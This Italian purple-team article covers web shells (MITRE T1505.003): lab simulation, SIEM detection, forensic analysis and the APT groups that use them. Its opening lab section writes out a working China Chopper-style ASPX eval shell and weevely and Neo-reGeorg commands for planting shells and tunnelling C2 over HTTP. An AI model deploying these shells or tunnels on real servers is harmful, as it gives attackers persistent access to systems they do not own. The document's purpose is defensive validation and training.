Backdoor nel Web Server: Web Shell (T1505.003)

L'obiettivo in laboratorio è simulare l'intera catena: upload della shell, stabilimento della persistenza e tunneling C2 attraverso il traffico HTTP. Questo consente di validare i controlli di detection e la segmentazione del web tier.

Fase 1 — Generazione della web shell. Il modo più realistico è partire da tool effettivamente usati in campagne documentate. China Chopper nella sua versione server-side è un one-liner ASPX che richiama eval() su un parametro POST. In laboratorio, puoi creare un file minimale di test:

echo '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>' > shell.aspx

Per ambienti PHP, una variante altrettanto ridotta sfrutta system():

echo '' > cmd.php

Entrambe vanno depositate nella web root del server target — tipicamente C:\inetpub\wwwroot per IIS oppure /var/www/html per Apache/Nginx.

Fase 2 — Deploy tramite exploit simulato. Se il red team dispone di accesso a un Exchange lab, lo strumento weevely (open source) genera shell PHP offuscate con canale cifrato integrato. La sintassi per generare un agente è:

weevely generate /tmp/backdoor.php

Per scenari ASPX su IIS, SharPyShell (open source) offre una shell .NET offuscata con supporto per esecuzione in-memory. Il deploy avviene copiando l'agente nella directory accessibile via web.

Fase 3 — Tunneling C2. La campagna Cutting Edge ha dimostrato l'uso massiccio di web shell per tunneling. In lab puoi replicarlo con Neo-reGeorg (open source), fork moderno di reGeorg che stabilisce un tunnel SOCKS attraverso richieste HTTP. La generazione del payload avviene con:

python neoreg.py generate -k --httpcode 200

Il file risultante va depositato sul server target; lato attaccante si avvia il tunnel SOCKS locale con:

python neoreg.py -k -u

Validazione della detection. Dopo ogni fase, verifica che il SIEM registri: la creazione di file nella web root (Sysmon EventID 11), il processo w3wp.exe che genera cmd.exe o powershell.exe (Sysmon EventID 1), e il traffico HTTP anomalo verso il file appena creato. Se questi alert non scattano, il blue team ha un gap da colmare.

Un tool complementare per il purple teaming è Atomic Red Team (open source), che include test specifici per T1505.003 eseguibili con un singolo comando Invoke-AtomicTest.

La detection delle web shell poggia su un principio semplice: un web server non dovrebbe mai generare processi figli di tipo shell o interprete di script. Quando w3wp.exe, httpd, nginx o tomcat generano cmd.exe, powershell.exe, bash o python, qualcosa è andato storto. Questo è il cuore dell'analytic AN1108 per Windows e AN1109 per Linux.

Log source critici. Su Windows, Sysmon è indispensabile. L'EventID 1 (Process Creation) cattura la catena padre-figlio, mentre l'EventID 11 (File Create) rileva la scrittura di file nelle directory web. Configura un filtro mirato sulla web root: C:\inetpub\wwwroot\**, C:\Program Files\Microsoft\Exchange Server\**\ClientAccess\**, e qualsiasi path custom del tuo ambiente IIS. Su Linux, auditd con regole sui syscall execve e openat nella web root (/var/www/html, /opt/lampp/htdocs) offre visibilità equivalente.

Il traffico di rete aggiunge un secondo livello: i flow NSM evidenziano richieste POST ripetute verso un singolo file con risposte di dimensione variabile — pattern tipico dell'interazione con una web shell. Un'analisi di volume e frequenza delle richieste HTTP verso file .aspx, .php o .jsp appena creati può produrre alert ad alta fedeltà.

Gestione dei falsi positivi. Il tuning è cruciale perché ambienti CMS come WordPress o applicazioni custom generano legittimamente file nelle directory web durante aggiornamenti o deploy. Tre accorgimenti riducono il rumore:

1. Whitelist dei processi di deploy — escludi i processi noti di CI/CD (es. agent Jenkins, Azure DevOps) dalle regole di file creation
2. Baseline dell'entropia — le web shell offuscate con Base64 o XOR presentano entropia superiore al codice applicativo; strumenti come freq.py possono calcolarla
3. Correlazione temporale — correla la creazione del file con l'esecuzione di un processo figlio entro una finestra di 60 secondi; un deploy legittimo raramente produce spawn di shell immediate

Controlli preventivi. La mitigazione M1042 suggerisce di disabilitare funzioni pericolose come eval() in PHP tramite la direttiva disable_functions nel file php.ini. La mitigazione M1018 rafforza il perimetro limitando gli account che possono scrivere nella web root: il principio di least privilege applicato all'identità del pool applicativo IIS o dell'utente Apache riduce la superficie d'attacco. Monitoring delle ACL sulla web root con SACL Windows o inotifywait (open source) su Linux completa il quadro di hardening.

L'analisi forense di una web shell segue una sequenza logica: identificare il file, ricostruire come è arrivato, determinare cosa ha fatto e per quanto tempo.

Identificazione del file. Il punto di partenza è lo scan della web root con YARA rules dedicate. Il progetto signature-base di Neo23x0 (open source) contiene regole aggiornate per le principali famiglie: China Chopper, ASPXSpy, reGeorg, P.A.S. Webshell. Il tool Loki (open source) automatizza lo scan combinando YARA, hash IOC e anomalie di filename. Su un server Windows compromesso:

loki.exe -p C:\inetpub\wwwroot --intense

La Master File Table ($MFT) di NTFS conserva i timestamp di creazione ($SI e $FN) anche se l'attaccante ha tentato di alterarli con timestomping. Lo strumento MFTECmd di Eric Zimmerman (open source) estrae questi dati:

MFTECmd.exe -f C:$MFT --csv C:\output

Confrontando $STANDARD_INFORMATION con $FILE_NAME si individuano discrepanze temporali indicative di manipolazione. Su Linux, lo stesso principio si applica con il timestamp del change time (ctime) dell'inode, non modificabile dall'utente senza accesso raw al filesystem.

Ricostruzione della catena di esecuzione. I log IIS (W3SVC1 in C:\inetpub\logs\LogFiles) registrano ogni richiesta HTTP con metodo, URI, user-agent e status code. Filtrando per il nome del file web shell — ad esempio spinstall0.aspx come nella campagna SharePoint ToolShell Exploitation, oppure AuditReport.jspx usato da Volt Typhoon — si ottiene la cronologia delle interazioni dell'attaccante. Su Apache/Nginx, il file access.log offre informazioni equivalenti.

I log Sysmon EventID 1 rivelano la catena di processo: w3wp.exe → cmd.exe → comandi eseguiti. L'EventID 3 (Network Connection) mostra eventuali connessioni in uscita generate dalla shell, particolarmente rilevanti quando la web shell funge da tunnel SOCKS come nel caso di Neo-reGeorg nella campagna 2022 Ukraine Electric Power Attack.

Timeline integrata. Strumenti come Plaso/log2timeline (open source) consentono di unificare artefatti eterogenei — $MFT, log IIS, log eventi Windows, Sysmon — in una supertimeline ordinata cronologicamente. Per campagne come HomeLand Justice, dove la persistenza ha preceduto l'azione distruttiva di circa 14 mesi, la supertimeline rivela il gap temporale tra il primo accesso (file creation della web shell) e l'inizio delle operazioni di esfiltrazione e wiping. L'artefatto chiave in questi casi è la persistenza del file: una web shell creata mesi prima dell'attività distruttiva conferma la pre-posizionamento strategico tipico delle operazioni state-sponsored iraniane e cinesi.

Le web shell sono un terreno comune dove convergono attori con motivazioni e capacità molto diverse. Analizzare chi le usa, come le sceglie e dove le deposita rivela pattern predittivi utili per il threat modeling.

Cluster iraniano — persistenza opportunistica. Almeno cinque gruppi iraniani utilizzano web shell come meccanismo primario di persistenza: OilRig, Magic Hound, Fox Kitten, CURIUM e, indirettamente, gli attori dietro la campagna HomeLand Justice. Il pattern comune è l'exploitation di servizi esposti (Exchange, applicazioni web) seguito dal deposito di shell ASP/ASPX generiche. La campagna HomeLand Justice (C0038) illustra un modello operativo in cui la web shell viene piazzata 14 mesi prima dell'azione distruttiva, suggerendo che il pre-posizionamento è dottrina operativa e non solo convenienza tattica.

Cluster cinese — diversificazione e sofisticazione. Gruppi come APT5, HAFNIUM, Volt Typhoon, Mustang Panda, Deep Panda, Leviathan, Threat Group-3390 e APT32 coprono uno spettro ampio di target e appliance. HAFNIUM ha distribuito contemporaneamente SIMPLESEESHARP, SPORTSBALL, China Chopper e ASPXSpy sui server Exchange compromessi — una ridondanza deliberata che garantisce persistenza anche se un vettore viene rimediato. Volt Typhoon ha esteso il target agli appliance Versa Director nella campagna omonima (C0039), dimostrando l'evoluzione verso l'infrastruttura di service provider per ottenere accesso a cascata sui clienti. La campagna SharePoint ToolShell Exploitation (C0058) conferma che Threat Group-3390 continua a sfruttare vulnerabilità su piattaforme Microsoft, questa volta SharePoint, con web shell ASPX depositate nelle directory di layout standard.

Convergenza sugli appliance VPN. La campagna Cutting Edge (C0029) segna un punto di svolta: attori China-nexus hanno sviluppato almeno cinque web shell custom — WIREFIRE, GLASSTOKEN, BUSHWALK, LIGHTWIRE, FRAMESTING — specifiche per Ivanti Connect Secure. Parallelamente, famiglie come SLIGHTPULSE, STEADYPULSE, PULSECHECK e RAPIDPULSE colpiscono lo stesso ecosistema Pulse Secure/Ivanti. Questo investimento in sviluppo suggerisce che gli appliance VPN rimarranno un vettore prioritario: la persistenza su dispositivi edge bypassa le difese endpoint tradizionali.

Attori distruttivi — dalla persistenza al sabotaggio. Sandworm Team e Ember Bear, entrambi collegati a operazioni contro l'Ucraina, impiegano web shell come P.A.S. Webshell, reGeorg e P0wnyshell non solo per persistenza ma come prerequisito per azioni cinetiche. La 2022 Ukraine Electric Power Attack (C0034) mostra la catena completa: Neo-reGeorg per il tunnel → accesso SCADA → comandi non autorizzati. Il FrostyGoop Incident (C0041) replica lo schema con una variante reGeorg usata per raggiungere controller ENCO via Modbus.

Indicatore predittivo. Quando un nuovo CVE critico colpisce un'applicazione web enterprise (Exchange, SharePoint, VPN appliance), la finestra tra disclosure e primo deploy di web shell si è compressa a ore. L'analista TI deve prioritizzare il monitoraggio di web shell note sulle piattaforme appena vulnerabili, usando il catalogo software (19 famiglie documentate) come checklist di hunting.

Framework MITRE ATT&CK: T1505.003, TA0003. Campagne: C0058, C0017, C0034, C0041, C0032, C0029, C0040, C0038, C0049, C0012, C0014, C0039. Mitigazioni: M1042, M1018. Detection: Sysmon, auditd, IIS Logs, NSM Flow. Tool citati: Loki, weevely, SharPyShell, Neo-reGeorg, MFTECmd, Plaso/log2timeline, Atomic Red Team. Integrato con conoscenza professionale per tool e procedure operative.